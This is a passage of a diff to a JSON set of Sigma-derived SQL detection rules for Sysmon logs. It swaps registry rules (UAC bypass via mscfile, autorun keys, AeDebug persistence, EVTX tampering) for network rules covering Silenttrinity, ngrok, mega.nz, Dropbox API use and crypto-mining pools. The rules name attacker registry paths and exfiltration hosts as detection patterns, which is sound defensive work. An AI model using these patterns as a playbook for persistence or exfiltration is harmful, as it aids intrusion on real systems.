default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "status": "test", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Dllhost Internet Connection", + "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "status": "test", + "description": "Detects Dllhost that communicates with public IP addresses", + "author": "bartblaze", "tags": [ + "attack.defense_evasion", + "attack.t1218", "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1559.001" ], "falsepositives": [ - "Unknown" + "Communication to other corporate systems that use IP addresses from public address spaces" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_dllhost_net_connections.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "CurrentVersion Autorun Keys Modification", - "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "status": "test", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate use of mega.nz uploaders and tools" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((Details = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND Details LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND Details IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND Details LIKE '%}\\\\python-%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND Details = 'ctfmon.exe /n') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (Details LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((Image LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR Image LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND Details LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Suspicious Service Installed", - "id": "f2485272-a156-4773-82d7-1d178bc4905b", - "status": "test", - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "title": "PowerShell Network Connections", + "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "status": "experimental", + "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + "Administrative scripts", + "Microsoft IP range" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\') AND Details LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_susp_service_installed.yml" + "filename": "net_connection_win_powershell_network_connection.yml" }, { - "title": "Add Debugger Entry To AeDebug For Persistence", - "id": "092af964-4233-4373-b4ba-d86ea2890288", - "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 